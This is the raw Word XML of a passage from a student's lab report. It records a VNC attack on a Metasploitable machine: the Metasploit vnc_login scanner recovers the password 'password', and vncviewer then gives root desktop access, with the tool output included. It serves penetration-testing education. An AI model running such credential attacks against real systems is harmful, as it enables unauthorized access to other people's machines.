                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Action performed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6496" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5403703D" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Output (services, ports)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970F89" w14:paraId="5671DED0" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="449FD900" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Initially, I tried searching the “</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>vnc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">”. Then, I tried to exploit </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>the each</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> module with excellent rank but nothing happened. Moreover, I tried to search other services but still nothing. After that, I googled the “</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>vnc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> VNC (protocol 3.3)” and saw the </w:t>
            </w:r>
            <w:hyperlink r:id="rId25">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                </w:rPr>
                <w:t>website</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> where was explained how to hacked that. In this state I surprised, as, we exploit the “auxiliary/scanner/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>vnc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>vnc_login</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">” module with rank normal, not excellent or even great. Moreover, we use scanner to know the password of our victim. So, I searched this module and used that. Then, I checked options, set the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>rhosts</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> and username “root”. After, I run the scanner and got the “192.168.1.85:5900     - 192.168.1.85:5900 - Login Successful</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>: :password</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>”. So, our password is “password”. Then, I used the “</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>vncviewer</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">” </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">command to launch a VNC viewer application, allowing us to remotely access and interact with a VNC server’s graphical desktop environment. So, I wrote the command with </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> of victim and wrote after password, eventually, I got the access to the machine with root privilege.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6496" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4354BD86" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>[*] 192.168.1.85:5900     - 192.168.1.85:5900 - Starting VNC login sweep</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24F7A66E" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>[!] 192.168.1.85:5900     - No active DB -- Credential data will not be saved!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BB8A141" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>[+] 192.168.1.85:5900     - 192.168.1.85:5900 - Login Successful</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>: :password</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="050F058C" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">[*] 192.168.1.85:5900     - Scanned 1 of 1 </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>hosts</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> (100% complete)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C54718D" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3E94EFB6" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>vncviewer</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> 192.168.1.85</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72BCE983" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Connected to RFB server, using protocol version 3.3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="545742F8" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Performing standard VNC authentication</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32B11204" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">Password: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E0CE8D6" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Authentication successful</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="604D3B39" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Desktop name "root's X desktop (metasploitable:0)"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DE5DF9D" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>VNC server default format:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46C03EB6" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">  32 bits per pixel.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58329A31" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">  Least significant byte first in each pixel.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28522DFB" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">  True </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>colour</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>: max red 255 green 255 blue 255, shift red 16 green 8 blue 0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73BACA66" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Using default colormap which is TrueColor.  Pixel format:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FF3B18D" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">  32 bits per pixel.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22EF49DD" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">  Least significant byte first in each pixel.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50F15C61" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">  True </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>colour</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>: max red 255 green 255 blue 255, shift red 16 green 8 blue 0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970F89" w14:paraId="4243B192" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="697DA8C7" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6496" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="14C0C49F" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3A001584" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30463CE0" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="119A21A3" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61092FE5" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00970F89">
      <w:footerReference w:type="even" r:id="rId26"/>
      <w:footerReference w:type="default" r:id="rId27"/>
      <w:footerReference w:type="first" r:id="rId28"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1134" w:right="567" w:bottom="1134" w:left="1701" w:header="0" w:footer="709"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8C977E" w14:textId="77777777" w:rsidR="00087DA5" w:rsidRDefault="00087DA5">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5F0E4DE9" w14:textId="77777777" w:rsidR="00087DA5" w:rsidRDefault="00087D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DejaVu Sans">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Liberation Serif">
    <w:altName w:val="Times New Roman"/>
    <w:charset w:val="01"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Calibri Light">
    <w:panose1 w:val="020F0302020204030204"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E4002EFF" w:usb1="C200247B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="OpenSymbol">
    <w:altName w:val="Cambria"/>
    <w:charset w:val="01"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Liberation Sans">
    <w:altName w:val="Arial"/>
    <w:charset w:val="01"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Noto Sans">
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E00082FF" w:usb1="400078FF" w:usb2="00000021" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Free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5DF317" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F8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847898" w14:textId="3263A318" w:rsidR="00970F89" w:rsidRDefault="00516075">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:ind w:right="360"/>
      <w:rPr>
        <w:lang w:val="lt-LT"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251657216" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="579C2472" wp14:editId="5731F3D2">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="margin">
                <wp:align>right</wp:align>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>635</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="153035" cy="175260"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapSquare wrapText="bothSides"/>
              <wp:docPr id="1400820567"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3035" cy="175260"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln w="0">
                        <a:noFill/>
                      </a:ln>
                    </wps:spPr>
                    <wps:style>
                      <a:lnRef idx="0">
                        <a:scrgbClr r="0" g="0" b="0"/>
                      </a:lnRef>
                      <a:fillRef idx="0">
                        <a:scrgbClr r="0" g="0" b="0"/>
                      </a:fillRef>
                      <a:effectRef idx="0">
                        <a:scrgbClr r="0" g="0" b="0"/>
                      </a:effectRef>
                      <a:fontRef idx="minor"/>
                    </wps:style>
                    <wps:txbx>
                      <w:txbxContent>
                        <w:p w14:paraId="7FDA5E2C" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
                          <w:pPr>
                            <w:pStyle w:val="Footer"/>
                            <w:rPr>
                              <w:lang w:val="lt-LT"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r>
                            <w:rPr>
                              <w:rStyle w:val="PageNumber"/>
                              <w:color w:val="000000"/>
                              <w:lang w:val="lt-LT"/>
                            </w:rPr>
                            <w:fldChar w:fldCharType="begin"/>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:rStyle w:val="PageNumber"/>
                              <w:color w:val="000000"/>
                              <w:lang w:val="lt-LT"/>
                            </w:rPr>
                            <w:instrText xml:space="preserve"> PAGE </w:instrText>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:rStyle w:val="PageNumber"/>
                              <w:color w:val="000000"/>
                              <w:lang w:val="lt-LT"/>
                            </w:rPr>
                            <w:fldChar w:fldCharType="separate"/>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:rStyle w:val="PageNumber"/>
                              <w:color w:val="000000"/>
                              <w:lang w:val="lt-LT"/>
                            </w:rPr>
                            <w:t>1</w:t>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:rStyle w:val="PageNumber"/>
                              <w:color w:val="000000"/>
                              <w:lang w:val="lt-LT"/>
                            </w:rPr>
                            <w:fldChar w:fldCharType="end"/>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rect w14:anchorId="579C2472" id="Rectangle 3" o:spid="_x0000_s1026" style="position:absolute;margin-left:-39.15pt;margin-top:.05pt;width:12.05pt;height:13.8pt;z-index:251657216;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" o:allowincell="f" filled="f" stroked="f" strokeweight="0">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w14:paraId="7FDA5E2C" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
                    <w:pPr>
                      <w:pStyle w:val="Footer"/>
                      <w:rPr>
                        <w:lang w:val="lt-LT"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rStyle w:val="PageNumber"/>
                        <w:color w:val="000000"/>
                        <w:lang w:val="lt-LT"/>
                      </w:rPr>
                      <w:fldChar w:fldCharType="begin"/>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rStyle w:val="PageNumber"/>
                        <w:color w:val="000000"/>
                        <w:lang w:val="lt-LT"/>
                      </w:rPr>
                      <w:instrText xml:space="preserve"> PAGE </w:instrText>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rStyle w:val="PageNumber"/>
                        <w:color w:val="000000"/>
                        <w:lang w:val="lt-LT"/>
                      </w:rPr>
                      <w:fldChar w:fldCharType="separate"/>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rStyle w:val="PageNumber"/>
                        <w:color w:val="000000"/>
                        <w:lang w:val="lt-LT"/>
                      </w:rPr>
                      <w:t>1</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rStyle w:val="PageNumber"/>
                        <w:color w:val="000000"/>
                        <w:lang w:val="lt-LT"/>
                      </w:rPr>
                      <w:fldChar w:fldCharType="end"/>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="square" anchorx="margin"/>
            </v:rect>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
    <w:r>
      <w:rPr>
        <w:lang w:val="lt-LT"/>
      </w:rPr>
      <w:t>By a student: Ihor Milevskyi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E666A9" w14:textId="28C6E141" w:rsidR="00970F89" w:rsidRDefault="00516075">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:ind w:right="360"/>
      <w:rPr>
        <w:lang w:val="lt-LT"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
